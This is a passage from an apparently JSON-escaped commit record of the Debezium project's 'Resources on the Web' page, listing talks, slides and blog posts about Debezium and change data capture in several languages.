https:\/\/tech.raksul.com\/2021\/12\/10\/debezium%e3%82%92%e5%88%a9%e7%94%a8%e3%81%97%e3%81%9fdb%e3%82%92%e5%90%8c%e6%9c%9f%e3%81%99%e3%82%8b%e4%bb%95%e7%b5%84%e3%81%bf%e3%81%a5%e3%81%8f%e3%82%8a\/[\"Debezium\u3092\u5229\u7528\u3057\u305fDB\u3092\u540c\u671f\u3059\u308b\u4ed5\u7d44\u307f\u3065\u304f\u308a\"] by Kishino Yusuke (blog post)\n\n=== \ud83c\udf0f Other\n\n* \ud83c\uddf5\ud83c\uddf1 https:\/\/wiadrodanych.pl\/big-data\/change-data-capture-mysql-debezium\/[\"Change Data Capture \u2013 Zmie\u0144 Baz\u0119 W Strumie\u0144 (Debezium)\"] by Maciej Szymczyk (blog post, Polish)\n* \ud83c\udde8\ud83c\uddf3 https:\/\/mp.weixin.qq.com\/s\/Mfn-fFegb5wzI8BIHhNGvQ[\"Flink SQL CDC \u4e0a\u7ebf\uff01\u6211\u4eec\u603b\u7ed3\u4e86 13 \u6761\u751f\u4ea7\u5b9e\u8df5\u7ecf\u9a8c\"] by Zeng Qingdong (blog post, Mandarin)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[\"Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium\"] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddf5\ud83c\uddf0 https:\/\/www.youtube.com\/playlist?list=PLYIDB7b23nqOcp-Gnff_KfZbp8PK4Z6jg[\"Change Data Capture Mechanism using Apache Kafka, Debezium and Postgres\"] by Waqas Dilawar (video playlist, Urdu)\n","old_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* https:\/\/www.youtube.com\/watch?v=_jy0VmpdSu4[\"DevOps 
Malaysia Online Meetup #32 : Using Debezium for Microservices Outbox Pattern\"] by CK Gan\n* https:\/\/www.youtube.com\/watch?v=yWFFOkWlLoY[\"Analyzing Real-time Order Deliveries using CDC with Debezium and Pinot\"] by Kenny Bastani and Gunnar Morling\n* https:\/\/www.youtube.com\/watch?v=R1kOuvLYcYo[\"Dissecting our Legacy: The Strangler Fig Pattern with Apache Kafka, Debezium and MongoDB\"] by Hans-Peter Grahsl and Gunnar Morling\n* https:\/\/2021.berlinbuzzwords.de\/session\/change-data-streaming-patterns-distributed-systems[\"Change Data Streaming Patterns in Distributed Systems\"] by Gunnar Morling and Hans-Peter Grahsl\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. 
Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 
2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/modanisa-engineering\/integrating-grafana-notifications-with-gitlab-pipeline-to-restart-debezium-tasks-using-go-1378c9eaf7b8[\"Integrating Grafana Notifications with GitLab Pipeline to restart Debezium tasks using Go\"] by Abdulsamet \u0130LER\u0130\n* https:\/\/www.reddit.com\/r\/RedditEng\/comments\/qkfx7a\/change_data_capture_with_debezium\/[\"Change Data Capture with Debezium\"] by Adriel Velazquez and Alan Tai\n* https:\/\/medium.com\/cermati-tech\/practical-notes-in-change-data-capture-with-debezium-and-postgres-fe31bb11ab78[\"Practical Notes in Change Data Capture with Debezium and Postgres\"] by Sharath Gururaj\n* https:\/\/medium.com\/google-cloud\/change-data-capture-with-debezium-server-on-gke-from-cloudsql-for-postgresql-to-pub-sub-d1c0b92baa98[\"Change Data Capture with Debezium Server on GKE from CloudSQL for PostgreSQL to Pub\/Sub\"] by Berker Narol\n* https:\/\/vkontech.com\/mongodb-change-data-capture-via-debezium-kafka-connector-with-a-net-5-client\/[\"MongoDB Change Data Capture via Debezium Kafka Connector with a .NET 5 Client\"] by Vasil Kosturski\n* https:\/\/engineering.outschool.com\/posts\/journey-to-better-search\/[\"The Journey to Better Search\"] by Jess Monroe, Nuria Ruiz and Parima Shah\n* https:\/\/snourian.com\/reliable-messaging-outbox-pattern-kafka-debezium-oracle-micronaut-kubernetes\/[\"Reliable Messaging in Microservices \u2013 Implementing Outbox Pattern using Kafka, Debezium, Micronaut, and Oracle Database on Kubernetes\"] by Sina Nourian\n* https:\/\/www.wix.engineering\/post\/the-reactive-monolith-how-to-move-from-crud-to-event-sourcing[\"The Reactive Monolith - How to Move from CRUD to Event Sourcing\"] by Jonathan David\n* https:\/\/techcommunity.microsoft.com\/t5\/azure-database-for-mysql\/cdc-in-azure-database-for-mysql-flexible-server-using-kafka\/ba-p\/2780943[\"CDC in Azure Database for MySQL \u2013 Flexible Server using Kafka, Debezium, and Azure Event Hubs\"] by Sudheesh Narayanaswamy\n* https:\/\/vectorized.io\/blog\/redpanda-debezium\/[\"Using Debezium and Redpanda for CDC\"] by Almas Maksotov\n* https:\/\/medium.com\/event-driven-utopia\/understanding-materialized-views-3-stream-table-joins-with-cdc-77591d2d6fa0[\"Understanding Materialized Views \u2014 Stream-Table Joins with CDC\"] by Dunith Dhanushka\n* https:\/\/materialize.com\/change-data-capture-is-having-a-moment-why[\"Change Data Capture is having a moment. Why?\"] by Andy Hattemer\n* https:\/\/braindose.blog\/2021\/09\/13\/true-atomic-microservices-debezium\/[\"A True Atomic Microservices Implementation with Debezium to Ensure Data Consistency\"] by CK Gan\n* https:\/\/itnext.io\/hydrating-a-data-lake-using-log-based-change-data-capture-cdc-with-debezium-apicurio-and-kafka-799671e0012f[\"Hydrating a Data Lake using Log-based Change Data Capture (CDC) with Debezium, Apicurio, and Kafka Connect on AWS\"] by Gary A. 
Stafford\n* Change Data Capture (CDC) With Kafka Connect and the Debezium Cassandra Connector (https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-and-debezium\/[Part 1], https:\/\/www.instaclustr.com\/change-data-capture-cdc-with-kafka-connect-and-the-debezium-cassandra-connector-part-2\/[Part 2]) by Paul Brebner\n* https:\/\/docs.microsoft.com\/en-us\/samples\/azure-samples\/azure-sql-db-change-stream-debezium\/smart-bulk-copy\/[\"Azure SQL \/ SQL Server Change Stream with Debezium\"] by Davide Mauri\n* https:\/\/developers.redhat.com\/articles\/2021\/06\/14\/application-modernization-patterns-apache-kafka-debezium-and-kubernetes[\"Application modernization patterns with Apache Kafka, Debezium, and Kubernetes\"] by Bilgin Ibryam\n* https:\/\/eresh-gorantla.medium.com\/change-data-capture-use-cases-and-real-world-example-using-debezium-fe4098579d49[\"Change Data Capture, Use Cases and real-world example using Debezium\"] by Eresh Gorantla\n* https:\/\/medium.com\/event-driven-utopia\/configuring-debezium-to-capture-postgresql-changes-with-docker-compose-224742ca5372[\"Configuring Debezium to Capture PostgreSQL Changes with Docker Compose\"] by Dunith Dhanushka\n* https:\/\/developers.redhat.com\/articles\/2021\/07\/30\/avoiding-dual-writes-event-driven-applications[\"Avoiding dual writes in event-driven applications\"] by Bernard Tison\n* https:\/\/dev.to\/foolonthehill\/build-a-event-driven-app-with-micronaut-kafka-and-debezium-11be[\"Build a event-driven app with Micronaut, Kafka and Debezium\"] by George Oliveira\n* https:\/\/pradeepdaniel.medium.com\/real-time-change-data-replication-to-snowflake-using-kafka-and-debezium-d6ebb0d4eb29[\"Creating an ETL data pipeline to sync data to Snowflake using Kafka and Debezium\"] by Pradeep Daniel \n* http:\/\/www.greentechjava.com\/2021\/07\/streaming-nrt-data-with-kafka-connect.html[\"Streaming NRT data with kafka connect and Debezium \"] by Akash Sharma\n* https:\/\/thedataguy.in\/integrate-debezium-with-aws-secret-manager-for-retrieving-passwords\/[\"Integrate Debezium with AWS Secret Manager For Retrieving Passwords\"] by Bhuvanesh\n* https:\/\/www.rtinsights.com\/application-modernization-and-change-data-capture\/[\"Application Modernization and Change Data Capture\"] by Salvatore Salamone\n* https:\/\/daily.dev\/blog\/building-a-fault-tolerant-event-driven-architecture-with-google-cloud-pulumi-and-debezium[\"Building a fault-tolerant event-driven architecture with Google Cloud, Pulumi and Debezium\"] by Ido Shamun\n* https:\/\/thenewstack.io\/kubernetes-run-analytics-at-the-edge-postgres-kafka-debezium\/[\"Kubernetes-Run Analytics at the Edge: Postgres, Kafka, Debezium\"] by Jonathan Katz\n* https:\/\/www.alibabacloud.com\/blog\/real-time-data-synchronization-based-on-flink-sql-cdc_597750[\"Real-Time Data Synchronization Based on Flink SQL CDC\"] by Wu Chong\n* https:\/\/medium.com\/globant\/change-data-capture-with-debezium-6eb523d57b1c[\"Change Data Capture with Debezium\"] by Ankit Mishra\n* https:\/\/medium.com\/event-driven-utopia\/8-practical-use-cases-of-change-data-capture-8f059da4c3b7[\"8 Practical Use Cases of Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/www.wix.engineering\/post\/change-data-capture-at-deviantart[\"Change Data Capture at DeviantArt\"] by Ruslan Danilin\n* https:\/\/www.infinitecatalog.com\/blog\/2021\/05\/30\/materialized-world.html[\"We Are Living in a Materialized World\"] by Udbhav Gupta\n* https:\/\/smarttechie.org\/2021\/03\/17\/audit-database-changes-with-debezium\/[\"Audit 
Database Changes with Debezium\"] by Siva Prasad Rao Janapati\n* https:\/\/medium.com\/geekculture\/change-data-capture-using-debezium-ec48631d643a[\"Change Data Capture \u2014 Using Debezium\"] by Ritresh Girdhar\n* https:\/\/lenses.io\/blog\/2021\/04\/change-data-capture-apache-kafka-break-up-monolith\/[\"Change Data Capture and Kafka to break up your monolith\"] by Guillaume Aym\u00e9\n* https:\/\/kvenkatraman.medium.com\/snowflake-near-real-time-ingestion-from-rdbms-using-debezium-and-kafka-92f00e2ee897[\"Snowflake - Near Real-Time Ingestion from RDBMS using Debezium and Kafka\"] by Karthik Venkatraman\n* https:\/\/medium.com\/capital-one-tech\/the-journey-from-batch-to-real-time-with-change-data-capture-c598e56146be[\"The Journey from Batch to Real-time with Change Data Capture\"] by Andrew Bonham\n* https:\/\/tech.willhaben.at\/change-data-capturing-with-debezium-at-willhaben-3579afd8be6b[\"Change Data Capturing with Debezium at willhaben\"] by Maurizio Rinder\n* https:\/\/shopify.engineering\/capturing-every-change-shopify-sharded-monolith[\"Capturing Every Change From Shopify\u2019s Sharded Monolith\"] by John Martin\n* https:\/\/dev.to\/hazelcast\/beyond-hello-world-zero-downtime-deployments-on-kubernetes-162o[\"Beyond 'Hello World': Zero-Downtime Deployments on Kubernetes \"] by Nicolas Frankel\n* https:\/\/lambda.grofers.com\/origins-of-data-lake-at-grofers-6c011f94b86c[\"Origins of Data Lake at Grofers -- Evolution of our data pipelines\"] by Akshay Agarwal\n* https:\/\/ducmanhphan.github.io\/2020-08-09-how-to-work-with-debezium\/[\"How to work with Debezium\"] by Manh Phan\n* https:\/\/reorchestrate.com\/posts\/debezium-performance-impact\/[\"Debezium does not impact source database performance\"] by Mike Seddon\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in 
Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! \u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/reveation-labs.medium.com\/streaming-events-from-sql-server-to-event-hub-in-azure-using-debezium-55dfd1a0e214[\"Streaming Events from SQL Server to Event Hub in Azure using Debezium\"] by Reveation Labs\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], 
https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/mike-costello.github.io\/2020\/04\/01\/Using_Debezium_With_AMQP_Events\/[\"Use CDC to create AMQP Based Events with Apache Camel and Debezium\"] by Michael Costello\n* https:\/\/gennadny.wordpress.com\/2020\/03\/22\/the-dead-philosophers-club-streaming-data-from-sql-server-to-azure-via-debezium-and-apache-kafka\/[\"The Dead Philosophers Club \u2013 Streaming Data from SQL Server to Azure via Debezium and Apache Kafka\"] by Gennady Kostinsky\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. 
Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/mauridb.medium.com\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream\"] by Davide Mauri\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* 
https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! 
